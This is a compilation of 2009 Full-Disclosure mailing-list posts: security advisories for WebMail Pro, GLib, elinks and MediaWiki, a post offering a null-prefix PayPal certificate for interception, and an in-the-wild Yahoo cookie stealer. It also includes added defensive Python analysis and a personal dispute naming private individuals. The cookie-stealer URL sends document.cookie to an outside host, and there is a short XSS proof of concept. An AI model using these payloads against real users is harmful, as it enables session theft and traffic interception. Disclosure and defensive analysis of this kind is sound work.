[Full-disclosure] GV-2009-01 : Cross-Site Scripting flaw in AfterLogic WebMail Pro
Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro

Description
-----------
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection of malicious code in the context of the application.

Overview
--------
Quote from http://www.afterlogic.com/products/webmail-pro :
"Webmail front-end for your existing POP3/IMAP mail server. Offer your users the fast AJAX webmail and innovative calendar with sharing. Stay in control with the admin panel and the developer's API."

Details
-------
Vulnerable Product    : AfterLogic WebMail Pro <= 4.7.10
Vulnerability Type    : Cross-Site Scripting (XSS)
Affected page         : history-storage.aspx
Vulnerable parameters : HistoryKey, HistoryStorageObjectName
Discovered by         : Sébastien Duquette (http://intheknow-security.blogspot.com)
                        Gardien Virtuel (www.gardienvirtuel.com)
Original Advisory     : http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt

Timeline
--------
Bug Discovered     : September 18th, 2009
Vendor Advised     : September 23rd, 2009
Fix made available : September 30th, 2009

Proof of concept
----------------
The targeted user must be logged in the webmail. This proof of concept was successfully tested in Firefox 3.5 and Internet Explorer 8.

http://WEBSITE/history-storage.aspx?param=0.21188772204998574"; onSubmit="return false;">

Solution
--------
The vendor has made available a patched version. Update to AfterLogic Webmail Pro 4.7.11

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-841-1] GLib vulnerability
===========================================================
Ubuntu Security Notice USN-841-1           October 05, 2009
glib2.0 vulnerability
CVE-2009-3289
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 8.04 LTS:
  libglib2.0-0    2.16.6-0ubuntu1.2

Ubuntu 8.10:
  libglib2.0-0    2.18.2-0ubuntu2.2

Ubuntu 9.04:
  libglib2.0-0    2.20.1-0ubuntu2.1

After a standard system upgrade you need to restart your session to effect the necessary changes.

Details follow:

Arand Nash discovered that applications linked to GLib (e.g. Nautilus) did not correctly copy symlinks. If a user copied symlinks with GLib, the symlink target files would become world-writable, allowing local attackers to gain access to potentially sensitive information.

Updated packages for Ubuntu 8.04 LTS:
[Full-disclosure] null-prefix certificate for paypal
If there's really a Moxie Marlinspike fan club [1], I'm definitely a member..

Attached is one of the null-prefix certificates [2] that he distributed during his "intercepting secure communication" training at Black Hat. This one's for www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, it works flawlessly with sslsniff [3] against all clients on Windows (IE, Chrome, Safari).

Also, because of Moxie's attacks against OCSP [4], I don't think this certificate can be revoked.

Enjoy!

[1]: http://www.linuxtoday.com/security/2009100102035NWNT
[2]: http://www.thughtcrime.org/papers/null-prefix-attacks.pdf
[3]: http://www.thoughtcrime.org/software/sslsniff/
[4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf
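For the null-prefix certificate post above: such a certificate carries a NUL byte inside its subject name, and a client that handles the name as a C string stops reading at that byte. The following is an added example, not code from the post or from sslsniff, that sets the flawed comparison beside a length-aware one. The host names and function names are constructed for illustration.

```python
import re

# Constructed sample: subject CN bytes as carried, with explicit length, in a
# certificate. Placeholder hosts, not values taken from the post.
SAMPLE_CN = b"www.bank.example\x00.attacker.example"

# One DNS label: letters, digits, hyphen; no leading or trailing hyphen.
LABEL = re.compile(rb"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def c_string(name: bytes) -> bytes:
    """What a NUL-terminated string API sees: the bytes before the first 0x00."""
    return name.split(b"\x00", 1)[0]


def naive_match(cert_name: bytes, host: str) -> bool:
    """Flawed check: compares the C-string view, so the name ends at the NUL."""
    return c_string(cert_name).lower() == host.encode("ascii").lower()


def is_dns_name(name: bytes) -> bool:
    """Length-aware syntax check over every byte of the name.

    A leading "*" label is allowed because certificates may carry wildcards.
    """
    if not name or len(name) > 253:
        return False
    labels = name.split(b".")
    if labels[0] == b"*":
        labels = labels[1:]
    return bool(labels) and all(LABEL.fullmatch(label) for label in labels)


def strict_match(cert_name: bytes, host: str) -> bool:
    """Hardened check: reject malformed names, then compare the full length.

    Wildcard expansion is left out to keep the example on the NUL case.
    """
    if not is_dns_name(cert_name):
        return False
    return cert_name.decode("ascii").lower() == host.lower()


def audit(names):
    """Flag names whose C-string view differs from their real content."""
    return [
        {"raw": n, "client_sees": c_string(n)}
        for n in names
        if c_string(n) != n
    ]


if __name__ == "__main__":
    host = "www.bank.example"
    print("naive :", naive_match(SAMPLE_CN, host))
    print("strict:", strict_match(SAMPLE_CN, host))
    print("audit :", audit([SAMPLE_CN, b"www.bank.example"]))
```

The same `audit` pass can be run over the CN and subjectAltName values of certificates already seen on a network to find names that would be read differently by C-string and length-aware parsers.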
[Full-disclosure] [SECURITY] [DSA 1902-1] New elinks packages fix arbitrary code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1902-1                  secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
October 05, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : elinks
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2008-7224
Debian Bug     : 380347

Jakub Wilk discovered an off-by-one buffer overflow in the charset handling of elinks, a feature-rich text-mode WWW browser, which might lead to the execution of arbitrary code if the user is tricked into opening a malformed HTML page.

For the old stable distribution (etch), this problem has been fixed in version 0.11.1-1.2etch2.

The stable distribution (lenny) and the unstable distribution (sid) already contain a patch for this problem.

We recommend that you upgrade your elinks package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mipsel, powerpc, s390 and sparc.
[Full-disclosure] Yahoo cookie stealer
Found in the wild:
http://funny.byethost16.com

Redirects to:
http://kr.gugi.yahoo.com/myBook/myregion.php?func_mode=loginAction&targetUrl=javascript:document.location=String.fromCharCode(104,116,116,112,58,47,47,102,117,110,110,121,46,98,121,101,116,104,111,115,116,49,54,46,99,111,109,47,105,110,100,101,120,46,112,104,112,63,105,115,114,61).concat(escape(document.cookie));
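For the redirect in the post above: the `targetUrl` parameter carries a `javascript:` URL rather than a navigation target, and the destination for the cookie is hidden in a `String.fromCharCode` call. The following is an added example, not part of the original post, of triage logic that flags such parameters in request logs and decodes the hidden string. The sample request is constructed with placeholder hosts, and the function names are illustrative.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Schemes that make a redirect target execute script instead of navigating.
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}
CHAR_CODES = re.compile(r"String\.fromCharCode\(([\d\s,]*)\)", re.IGNORECASE)
SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.-]*):")
LEADING_JUNK = "".join(chr(c) for c in range(0x21))  # C0 controls and space


def scheme_of(value: str):
    """Scheme as a browser's URL parser reads it: tab/CR/LF are dropped and
    leading control characters and spaces are skipped before the scheme."""
    cleaned = re.sub(r"[\t\r\n]", "", value).lstrip(LEADING_JUNK)
    match = SCHEME.match(cleaned)
    return match.group(1).lower() if match else None


def decode_char_codes(value: str):
    """Expand every String.fromCharCode(...) call to the text it builds."""
    return [
        "".join(chr(int(n)) for n in call.group(1).split(",") if n.strip())
        for call in CHAR_CODES.finditer(value)
    ]


def triage(url: str):
    """Report query parameters whose value is a script-scheme URL."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        scheme = scheme_of(value)
        if scheme in SCRIPT_SCHEMES:
            findings.append({
                "param": name,
                "scheme": scheme,
                "reads_cookie": "document.cookie" in value,
                "decoded": decode_char_codes(value),
            })
    return findings


def build_sample():
    """Constructed request in the shape of the posted one (placeholder hosts)."""
    codes = ",".join(str(ord(c)) for c in "http://collector.example/index.php?isr=")
    return ("http://portal.example/myregion.php?func_mode=loginAction"
            "&targetUrl=javascript:document.location=String.fromCharCode("
            + codes + ").concat(escape(document.cookie));")


if __name__ == "__main__":
    for finding in triage(build_sample()):
        print(finding)
```

On the server side the matching fix is to accept only `http`/`https` redirect targets on an allowlisted host, using the same scheme normalisation as `scheme_of`.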
[Full-disclosure] [SECURITY] [DSA 1901-1] New mediawiki1.7 packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1901-1                  secur...@debian.org
http://www.debian.org/security/                        Giuseppe Iuculano
October 05, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : mediawiki1.7
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2008-5249 CVE-2008-5250 CVE-2008-5252 CVE-2009-0737
Debian Bugs    : 508868 508869 508870 514547

Several vulnerabilities have been discovered in mediawiki1.7, a website engine for collaborative work. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-5249

  David Remahl discovered that mediawiki1.7 is prone to a cross-site scripting attack.

CVE-2008-5250

  David Remahl discovered that mediawiki1.7, when Internet Explorer is used and uploads are enabled, or an SVG scripting browser is used and SVG uploads are enabled, allows remote authenticated users to inject arbitrary web script or HTML by editing a wiki page.

CVE-2008-5252

  David Remahl discovered that mediawiki1.7 is prone to a cross-site request forgery vulnerability in the Special:Import feature.

CVE-2009-0737

  It was discovered that mediawiki1.7 is prone to a cross-site scripting attack in the web-based installer.

For the oldstable distribution (etch), these problems have been fixed in version 1.7.1-9etch1 for mediawiki1.7, and mediawiki is not affected (it is a metapackage for mediawiki1.7).

The stable (lenny) distribution does not include mediawiki1.7, and these problems have been fixed in version 1:1.12.0-2lenny3 for mediawiki which was already included in the lenny release.

The unstable (sid) and testing (squeeze) distributions do not include mediawiki1.7, and these problems have been fixed in version 1:1.14.0-1 for mediawiki.

We recommend that you upgrade your mediawiki1.7 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Re: [Full-disclosure] (No subject) legal threat from Alyse Auernheimer
Sorry about leaving sealpac in there, we're working on correcting that. I'll put a notice in the next one.

For the record, the post made in an earlier version of Andrew Auernheimer's infodoc states weev has an affiliation with sealpac. This is incorrect because weev just took the domain name and failed to give it back.

Since you find it necessary to forward this correspondence to the FBI, I'll make it public here for you. It's almost like you're fishing to be a victim or something. It's pathetic.

If it means anything: No one has made any threats to you. No one is going to harm you. No one has any ill-sentiment towards your family. You've been done a favor by having your relationship with weev clarified on here. You got your correction, you got your post down, quit being melodramatic.

On Mon, 05 Oct 2009 07:50:20 + Alyse Auernheimer wrote:

Lisa,

Please do not link Andrew Auernheimer with our business, Sealpac USA, he has nothing to do with it except he is holding our domain name hostage. We are planning on pursuing a court order to have it released. All of our emails concerning this subject will now be forwarded to the FBI as it may potentially impact our business. The individuals who say they are trying to help us are now causing more harm to us than Andrew himself. We are advised to have our home watched by law enforcement and our daughter's dorm. This is just wrong.

Thank You for your consideration.

Alyse